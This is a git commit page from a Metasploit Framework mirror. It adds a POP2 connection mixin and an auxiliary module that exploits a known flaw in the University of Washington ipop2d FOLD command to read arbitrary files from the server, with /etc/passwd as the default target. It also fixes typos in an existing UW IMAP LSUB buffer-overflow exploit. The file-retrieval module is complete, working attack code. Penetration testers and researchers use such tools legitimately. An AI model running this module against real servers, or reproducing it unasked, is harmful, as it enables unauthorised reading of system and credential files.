dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Added pop2 mixin, aux module, typos. 

git-svn-id: file:///home/svn/framework3/trunk@5550 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Patrick Webster 2008-07-08 14:21:48 +00:00
parent 4459fdd71d
commit 301b1514f3
4 changed files with 205 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
lib/msf/core/exploit.rb
View File

@ -236,6 +236,7 @@ class Exploit < Msf::Module
require 'msf/core/exploit/ndmp'
require 'msf/core/exploit/imap'
require 'msf/core/exploit/smtp_deliver'
require 'msf/core/exploit/pop2'
# Networks
require 'msf/core/exploit/lorcon'

134
lib/msf/core/exploit/pop2.rb Normal file
View File

@ -0,0 +1,134 @@
module Msf
require 'msf/core/exploit/tcp'
###
#
# This module exposes methods that may be useful to exploits that deal with
# servers that speak the POP2 protocol.
#
###
module Exploit::Remote::Pop2
include Exploit::Remote::Tcp
#
# Creates an instance of an POP2 exploit module.
#
def initialize(info = {})
super
# Register the options that all POP2 exploits may make use of.
register_options(
[
Opt::RHOST,
Opt::RPORT(109),
OptString.new('POP2USER', [ false, 'The username to authenticate as']),
OptString.new('POP2PASS', [ false, 'The password for the specified username'])
], Msf::Exploit::Remote::Pop2)
end
#
# This method establishes a POP2 connection to host and port specified by
# the RHOST and RPORT options, respectively. After connecting, the banner
# message is read in and stored in the 'banner' attribute.
#
def connect(global = true)
print_status("Connecting to POP2 server #{rhost}:#{rport}...")
fd = super
# Wait for a banner to arrive...
self.banner = fd.get_once
print_status("Connected to target POP2 server.")
print_status("Banner: #{self.banner.split("\n")[0].strip}")
# Return the file descriptor to the caller
fd
end
#
# Connect and login to the remote POP2 server using the credentials
# that have been supplied in the exploit options.
#
def connect_login(global = true)
pop2sock = connect(global)
if (not (user and pass))
print_status("No username and password were supplied, unable to login")
return false
end
print_status("Authenticating as #{user} with password #{pass}...")
res = raw_send_recv("HELO #{user} #{pass}\r\n")
if (res !~ /messages/)
print_status("Authentication failed")
return false
end
print_status("Messages: #{res}")
return true
end
#
# This method transmits a POP2 command and waits for a response. If one is
# received, it is returned to the caller.
#
def raw_send_recv(cmd, nsock = self.sock)
nsock.put(cmd)
res = nsock.get_once
end
#
# This method sends one command with zero or more parameters
#
def send_cmd(args, recv = true, nsock = self.sock)
cmd = args.join(" ") + "\r\n"
if (recv)
return raw_send_recv(cmd, nsock)
else
return raw_send(cmd, nsock)
end
end
#
# This method transmits a FTP command and does not wait for a response
#
def raw_send(cmd, nsock = self.sock)
nsock.put(cmd)
end
##
#
# Wrappers for getters
#
##
#
# Returns the user string from the 'POP2USER' option.
#
def user
datastore['POP2USER']
end
#
# Returns the user string from the 'POP2PASS' option.
#
def pass
datastore['POP2PASS']
end
protected
#
# This attribute holds the banner that was read in after a successful call
# to connect or connect_login.
#
attr_accessor :banner
end
end

67
modules/auxiliary/admin/pop2/uw_fileretrieval.rb Normal file
View File

@ -0,0 +1,67 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Auxiliary::Admin::Pop2::Uw_FileRetrieval < Msf::Auxiliary
include Exploit::Remote::Pop2
def initialize(info = {})
super(update_info(info,
'Name' => 'UoW pop2d Remote File Retrieval Vulnerability',
'Description' => %q{
This module exploits a vulnerability in the FOLD command of the
University of Washington ipop2d service. By specifying an arbitrary
folder name it is possible to retrieve any file which is world or group
readable by the user ID of the POP account. This vulnerability can only
be exploited with a valid username and password. The From address is
the file owner.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '368' ],
[ 'BID', '1484' ],
],
'DisclosureDate' => 'Jul 14 2000'))
register_options(
[
OptString.new('FILE', [ true, "The file to retrieve", '/etc/passwd' ])
], self.class)
end
def run
connect_login
file = datastore['FILE']
res = send_cmd( ['FOLD', file] , true)
if (res =~ /#1 messages in/)
send_cmd( ['READ 1'] , true)
file_output = send_cmd( ['RETR'] , true)
print_status("File output:\r\n\r\n#{file_output}\r\n")
send_cmd( ['ACKS'] , true)
elsif (res =~ /#0 messages in/)
print_status("File #{file} not found or read-access is denied.")
end
send_cmd( ['QUIT'] , true)
disconnect
end
end
end

6
modules/exploits/linux/imap/imap_uw_lsub.rb
View File

@ -14,7 +14,7 @@ require 'msf/core'
module Msf
class Exploits::Linux::Imap::Imap_UW_LSub < Msf::Exploit::Remote
class Exploits::Linux::Imap::Imap_UW_LSub < Msf::Exploit::Remote
include Exploit::Remote::Imap
@ -23,7 +23,7 @@ module Msf
'Name' => 'UoW IMAP server LSUB Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the 'LSUB'
command of the the University of Washington IMAP service.
command of the University of Washington IMAP service.
This vulnerability can only be exploited with a valid username
and password.
},
@ -72,7 +72,7 @@ module Msf
connect_login
print_status("Sending overflow string...")
req = "a001 LSUB \"\" {1064}\r\n"
req = "a002 LSUB \"\" {1064}\r\n"
sock.put(req)
sleep(2)